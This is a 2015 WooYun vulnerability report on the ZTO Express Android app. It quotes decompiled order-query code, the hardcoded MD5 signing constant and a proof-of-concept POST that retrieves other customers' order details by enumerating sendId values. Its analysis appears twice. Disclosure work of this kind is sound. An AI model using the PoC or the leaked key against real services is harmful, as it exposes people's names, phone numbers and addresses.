
漏洞概要 关注数(24)

缺陷编号:wooyun-2015-0109482

漏洞标题:中通快递某处遍历获取大量订单信息

相关厂商:中通速递

漏洞作者: firexp

提交时间:2015-04-21 19:21

修复时间:2015-06-05 21:26

公开时间:2015-06-05 21:26

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-21: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向核心白帽子及相关领域专家公开
2015-05-11: 细节向普通白帽子公开
2015-05-21: 细节向实习白帽子公开
2015-06-05: 细节向公众公开

简要描述:

可获取收件人电话、地址。

详细说明:

漏洞位于中通快递 Android App 中。用 JEB 反编译后，在 com.geenk.activity.MyZTO_MyOrder 类中可以看到如下代码：

// NOTE(review): JEB decompiler output of the "my orders" click handler. The goto/label_* forms are
// not valid Java; they are how the decompiler rendered the loop and exception edges of the original
// bytecode, so follow the labels rather than the nesting when reading the control flow.
// Overall: build a SEARCH query identified only by sendId, POST it, collect the returned orderCode
// values, POST a SEARCHBYCODE query for their details, cache each sender's name/mobile/address in
// the local "order_zto" table, then notify the UI handler.
// NOTE(review): the request "signature" is a digest over the body plus a constant that ships inside
// the APK, so it cannot prove who is calling; the server has to bind sendId to the authenticated
// session itself rather than trust data_digest as an identity check.
public void onClick(View v) {
    // 2 is presumably NetworkUtil's "connected" state — confirm against that class.
    if(new NetworkUtil().checkNetworkState(MyZTO_MyOrder.this.getParent()) == 2) {
        MyZTO_MyOrder.this.dialogUtil.showWaitDialog("请稍等...");
        JSONObject v2 = new JSONObject();
        try {
            // Author's note: sendId is enumerable — a seven-digit number. It is the only field in
            // the request that identifies the account; nothing below ties it to a login session.
            v2.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
            v2.put("starttime", "2014-04-28 10:10:10");
            // NOTE(review): "HH:MM:ss" puts the month-of-year in the minutes slot (SimpleDateFormat
            // uses mm for minutes), so endtime is malformed; presumably "HH:mm:ss" was intended.
            v2.put("endtime", new SimpleDateFormat("yyyy-MM-dd HH:MM:ss").format(new Date()));
            v2.put("pageSize", 10);
            v2.put("pageIndex", 1);
            new Thread() {
                // Network round trips and the SQLite cache update run off the UI thread;
                // val$param_zto is the decompiler's name for the captured v2 above.
                public void run() {
                    String v25;
                    JSONObject v17;
                    Object v11;
                    JSONArray v10;
                    String v5;
                    String v4;
                    try {
                        // Request "signature": a digest (MD5, per the helper name) over the JSON text
                        // plus a constant suffix compiled into the app. Anyone holding the APK can
                        // reproduce it, so data_digest cannot authenticate the caller — at most it
                        // detects accidental corruption of the body.
                        v4 = String.valueOf(this.val$param_zto.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                        new MD5();  // instance discarded; encodeByMD5 is used as a static call
                        v5 = MD5.encodeByMD5(v4);
                        HashMap v21 = new HashMap();
                        v21.put("data", this.val$param_zto.toString());
                        v21.put("data_digest", v5);
                        v21.put("msg_type", "SEARCH");
                        v21.put("company_id", "APP");
                        // Author's note: the POST to http://japi.zto.cn/zto/api_utf8/commonOrder does not
                        // verify the user's permission, so the orderCode list of any sendId can be obtained.
                        // NOTE(review): that URL is plain http://, so body and digest travel in cleartext
                        // (the value of URL_BILL_QUERY itself is not visible here).
                        this.this$1.this$0.result = HttpGetPost.httpPost(ZTOApplication.URL_BILL_QUERY, v21);
                        // The full server response is written to stdout (logcat on Android).
                        System.out.println("订单申请:" + this.this$1.this$0.result);
                    }
                    catch(Exception v8) {
                        // NOTE(review): after a failed POST, result keeps whatever it held before
                        // (possibly null), and the contains() call below would then throw.
                        v8.printStackTrace();
                    }
                    // Success is detected by a substring search for "true" anywhere in the body.
                    if(!this.this$1.this$0.result.contains("true")) {
                        goto label_395;
                    }
                    JSONArray v16 = new JSONArray();
                    try {
                        // Collect every orderCode of the returned page ...
                        JSONArray v15 = new JSONObject(this.this$1.this$0.result).getJSONObject("data").getJSONArray("order_list");
                        if(v15.length() <= 0) {
                            goto label_387;
                        }
                        int v9;
                        for(v9 = 0; v9 < v15.length(); ++v9) {
                            v16.put(v15.get(v9).getString("orderCode"));
                        }
                        // ... and request their details by code. The body again carries only
                        // orderCode and the enumerable sendId as its account binding.
                        JSONObject v26 = new JSONObject();
                        v26.put("orderCode", v16);
                        v26.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
                        v4 = String.valueOf(v26.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                        // Author's note: secret leaked — the same constant suffix signs the detail query.
                        new MD5();
                        v5 = MD5.encodeByMD5(v4);
                        HashMap v22 = new HashMap();
                        v22.put("data", v26.toString());
                        v22.put("data_digest", v5);
                        v22.put("msg_type", "SEARCHBYCODE");
                        v22.put("company_id", "APP");
                        try {
                            this.this$1.this$0.detail_result = HttpGetPost.httpPost(ZTOApplication.URL_BILL_QUERY, v22);
                            // The detail payload — the field reads below show it carries sender
                            // name, mobile and address — is also written to stdout.
                            System.out.println("订单详情数据:" + this.this$1.this$0.detail_result);
                            goto label_148;
                        }
                        catch(IOException v8_1) {
                            try {
                                v8_1.printStackTrace();
                                // label_148 is reached from the success path and from both catch
                                // blocks, i.e. detail_result is parsed even after a failed POST.
                                label_148:
                                v10 = new JSONObject(this.this$1.this$0.detail_result).getJSONObject("data").getJSONArray("order_list");
                                if(v10.length() > 0) {
                                    // delete(ctx, "order_zto", "1", "1") — presumably where "1" = "1",
                                    // i.e. wipe the cache table before refilling; confirm against SQLite.
                                    SQLite.getInstance().delete(this.this$1.this$0.getApplicationContext(), "order_zto", "1", "1");
                                    SQLite.getInstance().closeConn();
                                }
                                v9 = 0;
                                // label_176 / label_179: head and exit of the decompiled loop over v10.
                                label_176:
                                while(v9 >= v10.length()) {
                                    goto label_179;
                                }
                            }
                            catch(JSONException v7) {
                                goto label_203;
                            }
                        }
                        catch(ClientProtocolException v8_2) {
                            try {
                                v8_2.printStackTrace();
                                goto label_148;
                            }
                            catch(JSONException v7) {
                                goto label_203;
                            }
                        }
                    }
                    catch(JSONException v7) {
                        goto label_203;
                    }
                    // Loop body: one order per iteration.
                    try {
                        v11 = v10.get(v9);
                        v17 = ((JSONObject)v11).getJSONObject("sender");
                        v25 = ((JSONObject)v11).getString("orderCode");
                        goto label_220;
                    }
                    catch(JSONException v7) {
                        try {
                            v7.printStackTrace();
                            // Cache the sender's contact details locally. name is stored under two
                            // columns and mobile under two; the remaining columns are always blank.
                            label_220:
                            ContentValues v6 = new ContentValues();
                            v6.put("order_num", v25);
                            v6.put("address_label", v17.getString("name"));
                            v6.put("personal_sent", v17.getString("name"));
                            v6.put("phone_num", v17.getString("mobile"));
                            v6.put("area", "");
                            v6.put("address_detail", v17.getString("address"));
                            v6.put("zip_code", "");
                            v6.put("sex", "");
                            v6.put("name_company", "");
                            v6.put("telephone_number", v17.getString("mobile"));
                            v6.put("fax", "");
                            v6.put("website", "");
                            v6.put("email", "");
                            v6.put("QQ", "");
                            v6.put("wangwang", "");
                            v6.put("province_id", "");
                            v6.put("province", v17.getString("prov"));
                            v6.put("city_id", "");
                            v6.put("city", v17.getString("city"));
                            v6.put("district_id", "");
                            v6.put("district", v17.getString("county"));
                            v6.put("time", ((JSONObject)v11).getString("create_date"));
                            try {
                                System.out.println("插入订单个数" + SQLite.getInstance().insert(this.this$1.this$0.getApplicationContext(), "order_zto", null, v6));
                                SQLite.getInstance().closeConn();
                            }
                            catch(Exception v7_1) {
                                try {
                                    v7_1.printStackTrace();
                                }
                                catch(JSONException v7) {
                                    goto label_203;
                                }
                            }
                        }
                        catch(JSONException v7) {
                            goto label_203;
                        }
                    }
                    ++v9;
                    goto label_176;
                    try {
                        // Handler codes, inferred from the branches that reach them (confirm against
                        // the handler): 10 = details cached, 30 = empty order list, 20 = search failed.
                        label_179:
                        this.this$1.this$0.handler.sendEmptyMessage(10);
                        return;
                        label_387:
                        this.this$1.this$0.handler.sendEmptyMessage(30);
                    }
                    catch(JSONException v7) {
                        // Shared sink for every JSONException raised above.
                        label_203:
                        v7.printStackTrace();
                    }
                    return;
                    label_395:
                    this.this$1.this$0.handler.sendEmptyMessage(20);
                }
            }.start();
        }
        catch(Exception v0) {
            v0.printStackTrace();
        }
    }
}
});
this.tittle = this.findViewById(2131099684);
this.tittle.setText("我的订单");
this.lv_order = this.findViewById(2131099686);
MyZTO_MyOrder.list = new ArrayList();
MyZTO_MyOrder.adapter = new OrderManagerAdapter(((Context)this), MyZTO_MyOrder.list);
this.lv_order.setOnItemClickListener(new AdapterView$OnItemClickListener() {
// Opens the detail screen for the tapped row inside the activity group: the row position
// travels in the "index" extra, the child activity is started under the id "UpdatePassword"
// (presumably a copied id — confirm) and its decor view is swapped into the group.
public void onItemClick(AdapterView arg6, View arg1, int arg2, long arg3) {
    Intent detailIntent = new Intent(MyZTO_MyOrder.this, MyZTO_Order_Detail.class);
    detailIntent.putExtra("index", arg2);
    // 67108864 == 0x04000000 == FLAG_ACTIVITY_CLEAR_TOP; addFlags returns the same Intent.
    detailIntent.addFlags(67108864);
    MyZTOActivity.group.replaceView(
            MyZTOActivity.group.getLocalActivityManager()
                    .startActivity("UpdatePassword", detailIntent)
                    .getDecorView());
}
});
this.lv_order.setAdapter(MyZTO_MyOrder.adapter);
new Thread() {
// Background load of the order list: getData() runs off the UI thread and its result is
// handed to the activity's handler as a message with what == 1 (meaning defined by the handler).
public void run() {
    Message loaded = new Message();
    loaded.what = 1;
    loaded.obj = MyZTO_MyOrder.this.getData();
    MyZTO_MyOrder.this.handler.sendMessage(loaded);
}
}.start();
}


见截图:

QQ图片20150421191227.jpg


poc:
POST http://japi.zto.cn/zto/api_utf8/commonOrder
data={"sendId":"1332829","orderCode":["ZT15042134425441"]}&data_digest=cd3e3b9a037a115faed3426295e70898&msg_type=SEARCHBYCODE&company_id=APP

漏洞证明:

漏洞位于中通快递 Android App 中。用 JEB 反编译后，在 com.geenk.activity.MyZTO_MyOrder 类中可以看到如下代码：

// NOTE(review): JEB decompiler output of the "my orders" click handler. The goto/label_* forms are
// not valid Java; they are how the decompiler rendered the loop and exception edges of the original
// bytecode, so follow the labels rather than the nesting when reading the control flow.
// Overall: build a SEARCH query identified only by sendId, POST it, collect the returned orderCode
// values, POST a SEARCHBYCODE query for their details, cache each sender's name/mobile/address in
// the local "order_zto" table, then notify the UI handler.
// NOTE(review): the request "signature" is a digest over the body plus a constant that ships inside
// the APK, so it cannot prove who is calling; the server has to bind sendId to the authenticated
// session itself rather than trust data_digest as an identity check.
public void onClick(View v) {
    // 2 is presumably NetworkUtil's "connected" state — confirm against that class.
    if(new NetworkUtil().checkNetworkState(MyZTO_MyOrder.this.getParent()) == 2) {
        MyZTO_MyOrder.this.dialogUtil.showWaitDialog("请稍等...");
        JSONObject v2 = new JSONObject();
        try {
            // Author's note: sendId is enumerable — a seven-digit number. It is the only field in
            // the request that identifies the account; nothing below ties it to a login session.
            v2.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
            v2.put("starttime", "2014-04-28 10:10:10");
            // NOTE(review): "HH:MM:ss" puts the month-of-year in the minutes slot (SimpleDateFormat
            // uses mm for minutes), so endtime is malformed; presumably "HH:mm:ss" was intended.
            v2.put("endtime", new SimpleDateFormat("yyyy-MM-dd HH:MM:ss").format(new Date()));
            v2.put("pageSize", 10);
            v2.put("pageIndex", 1);
            new Thread() {
                // Network round trips and the SQLite cache update run off the UI thread;
                // val$param_zto is the decompiler's name for the captured v2 above.
                public void run() {
                    String v25;
                    JSONObject v17;
                    Object v11;
                    JSONArray v10;
                    String v5;
                    String v4;
                    try {
                        // Request "signature": a digest (MD5, per the helper name) over the JSON text
                        // plus a constant suffix compiled into the app. Anyone holding the APK can
                        // reproduce it, so data_digest cannot authenticate the caller — at most it
                        // detects accidental corruption of the body.
                        v4 = String.valueOf(this.val$param_zto.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                        new MD5();  // instance discarded; encodeByMD5 is used as a static call
                        v5 = MD5.encodeByMD5(v4);
                        HashMap v21 = new HashMap();
                        v21.put("data", this.val$param_zto.toString());
                        v21.put("data_digest", v5);
                        v21.put("msg_type", "SEARCH");
                        v21.put("company_id", "APP");
                        // Author's note: the POST to http://japi.zto.cn/zto/api_utf8/commonOrder does not
                        // verify the user's permission, so the orderCode list of any sendId can be obtained.
                        // NOTE(review): that URL is plain http://, so body and digest travel in cleartext
                        // (the value of URL_BILL_QUERY itself is not visible here).
                        this.this$1.this$0.result = HttpGetPost.httpPost(ZTOApplication.URL_BILL_QUERY, v21);
                        // The full server response is written to stdout (logcat on Android).
                        System.out.println("订单申请:" + this.this$1.this$0.result);
                    }
                    catch(Exception v8) {
                        // NOTE(review): after a failed POST, result keeps whatever it held before
                        // (possibly null), and the contains() call below would then throw.
                        v8.printStackTrace();
                    }
                    // Success is detected by a substring search for "true" anywhere in the body.
                    if(!this.this$1.this$0.result.contains("true")) {
                        goto label_395;
                    }
                    JSONArray v16 = new JSONArray();
                    try {
                        // Collect every orderCode of the returned page ...
                        JSONArray v15 = new JSONObject(this.this$1.this$0.result).getJSONObject("data").getJSONArray("order_list");
                        if(v15.length() <= 0) {
                            goto label_387;
                        }
                        int v9;
                        for(v9 = 0; v9 < v15.length(); ++v9) {
                            v16.put(v15.get(v9).getString("orderCode"));
                        }
                        // ... and request their details by code. The body again carries only
                        // orderCode and the enumerable sendId as its account binding.
                        JSONObject v26 = new JSONObject();
                        v26.put("orderCode", v16);
                        v26.put("sendId", ZTOApplication.ACCOUNT_ONLY_ID);
                        v4 = String.valueOf(v26.toString()) + "WkhPTkdUT05HS1VBSURJQVBQ";
                        // Author's note: secret leaked — the same constant suffix signs the detail query.
                        new MD5();
                        v5 = MD5.encodeByMD5(v4);
                        HashMap v22 = new HashMap();
                        v22.put("data", v26.toString());
                        v22.put("data_digest", v5);
                        v22.put("msg_type", "SEARCHBYCODE");
                        v22.put("company_id", "APP");
                        try {
                            this.this$1.this$0.detail_result = HttpGetPost.httpPost(ZTOApplication.URL_BILL_QUERY, v22);
                            // The detail payload — the field reads below show it carries sender
                            // name, mobile and address — is also written to stdout.
                            System.out.println("订单详情数据:" + this.this$1.this$0.detail_result);
                            goto label_148;
                        }
                        catch(IOException v8_1) {
                            try {
                                v8_1.printStackTrace();
                                // label_148 is reached from the success path and from both catch
                                // blocks, i.e. detail_result is parsed even after a failed POST.
                                label_148:
                                v10 = new JSONObject(this.this$1.this$0.detail_result).getJSONObject("data").getJSONArray("order_list");
                                if(v10.length() > 0) {
                                    // delete(ctx, "order_zto", "1", "1") — presumably where "1" = "1",
                                    // i.e. wipe the cache table before refilling; confirm against SQLite.
                                    SQLite.getInstance().delete(this.this$1.this$0.getApplicationContext(), "order_zto", "1", "1");
                                    SQLite.getInstance().closeConn();
                                }
                                v9 = 0;
                                // label_176 / label_179: head and exit of the decompiled loop over v10.
                                label_176:
                                while(v9 >= v10.length()) {
                                    goto label_179;
                                }
                            }
                            catch(JSONException v7) {
                                goto label_203;
                            }
                        }
                        catch(ClientProtocolException v8_2) {
                            try {
                                v8_2.printStackTrace();
                                goto label_148;
                            }
                            catch(JSONException v7) {
                                goto label_203;
                            }
                        }
                    }
                    catch(JSONException v7) {
                        goto label_203;
                    }
                    // Loop body: one order per iteration.
                    try {
                        v11 = v10.get(v9);
                        v17 = ((JSONObject)v11).getJSONObject("sender");
                        v25 = ((JSONObject)v11).getString("orderCode");
                        goto label_220;
                    }
                    catch(JSONException v7) {
                        try {
                            v7.printStackTrace();
                            // Cache the sender's contact details locally. name is stored under two
                            // columns and mobile under two; the remaining columns are always blank.
                            label_220:
                            ContentValues v6 = new ContentValues();
                            v6.put("order_num", v25);
                            v6.put("address_label", v17.getString("name"));
                            v6.put("personal_sent", v17.getString("name"));
                            v6.put("phone_num", v17.getString("mobile"));
                            v6.put("area", "");
                            v6.put("address_detail", v17.getString("address"));
                            v6.put("zip_code", "");
                            v6.put("sex", "");
                            v6.put("name_company", "");
                            v6.put("telephone_number", v17.getString("mobile"));
                            v6.put("fax", "");
                            v6.put("website", "");
                            v6.put("email", "");
                            v6.put("QQ", "");
                            v6.put("wangwang", "");
                            v6.put("province_id", "");
                            v6.put("province", v17.getString("prov"));
                            v6.put("city_id", "");
                            v6.put("city", v17.getString("city"));
                            v6.put("district_id", "");
                            v6.put("district", v17.getString("county"));
                            v6.put("time", ((JSONObject)v11).getString("create_date"));
                            try {
                                System.out.println("插入订单个数" + SQLite.getInstance().insert(this.this$1.this$0.getApplicationContext(), "order_zto", null, v6));
                                SQLite.getInstance().closeConn();
                            }
                            catch(Exception v7_1) {
                                try {
                                    v7_1.printStackTrace();
                                }
                                catch(JSONException v7) {
                                    goto label_203;
                                }
                            }
                        }
                        catch(JSONException v7) {
                            goto label_203;
                        }
                    }
                    ++v9;
                    goto label_176;
                    try {
                        // Handler codes, inferred from the branches that reach them (confirm against
                        // the handler): 10 = details cached, 30 = empty order list, 20 = search failed.
                        label_179:
                        this.this$1.this$0.handler.sendEmptyMessage(10);
                        return;
                        label_387:
                        this.this$1.this$0.handler.sendEmptyMessage(30);
                    }
                    catch(JSONException v7) {
                        // Shared sink for every JSONException raised above.
                        label_203:
                        v7.printStackTrace();
                    }
                    return;
                    label_395:
                    this.this$1.this$0.handler.sendEmptyMessage(20);
                }
            }.start();
        }
        catch(Exception v0) {
            v0.printStackTrace();
        }
    }
}
});
this.tittle = this.findViewById(2131099684);
this.tittle.setText("我的订单");
this.lv_order = this.findViewById(2131099686);
MyZTO_MyOrder.list = new ArrayList();
MyZTO_MyOrder.adapter = new OrderManagerAdapter(((Context)this), MyZTO_MyOrder.list);
this.lv_order.setOnItemClickListener(new AdapterView$OnItemClickListener() {
// Opens the detail screen for the tapped row inside the activity group: the row position
// travels in the "index" extra, the child activity is started under the id "UpdatePassword"
// (presumably a copied id — confirm) and its decor view is swapped into the group.
public void onItemClick(AdapterView arg6, View arg1, int arg2, long arg3) {
    Intent detailIntent = new Intent(MyZTO_MyOrder.this, MyZTO_Order_Detail.class);
    detailIntent.putExtra("index", arg2);
    // 67108864 == 0x04000000 == FLAG_ACTIVITY_CLEAR_TOP; addFlags returns the same Intent.
    detailIntent.addFlags(67108864);
    MyZTOActivity.group.replaceView(
            MyZTOActivity.group.getLocalActivityManager()
                    .startActivity("UpdatePassword", detailIntent)
                    .getDecorView());
}
});
this.lv_order.setAdapter(MyZTO_MyOrder.adapter);
new Thread() {
// Background load of the order list: getData() runs off the UI thread and its result is
// handed to the activity's handler as a message with what == 1 (meaning defined by the handler).
public void run() {
    Message loaded = new Message();
    loaded.what = 1;
    loaded.obj = MyZTO_MyOrder.this.getData();
    MyZTO_MyOrder.this.handler.sendMessage(loaded);
}
}.start();
}


见截图:

QQ图片20150421191227.jpg


poc:
POST http://japi.zto.cn/zto/api_utf8/commonOrder
data={"sendId":"1332829","orderCode":["ZT15042134425441"]}&data_digest=cd3e3b9a037a115faed3426295e70898&msg_type=SEARCHBYCODE&company_id=APP

修复方案:

版权声明:转载请注明来源 firexp@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-04-21 21:25

厂商回复:

感谢白帽子的提醒,我们会尽快修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-14 08:01 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    这是手机抓包软件吗?

  2. 2015-06-05 22:12 | RipZ ( 普通白帽子 | Rank:146 漏洞数:38 | 安装tc130精神扰乱装置)

    @刘海哥 同问。。

  3. 2015-06-05 22:24 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    洞主 第一个第二个截图是什么软件啊

  4. 2015-06-05 22:55 | firexp ( 普通白帽子 | Rank:107 漏洞数:9 | 哈哈)

    chrome postman插件

  5. 2015-06-06 13:17 | RipZ ( 普通白帽子 | Rank:146 漏洞数:38 | 安装tc130精神扰乱装置)

    @firexp 3q 我还以为手机上的app神器。。一直用burp截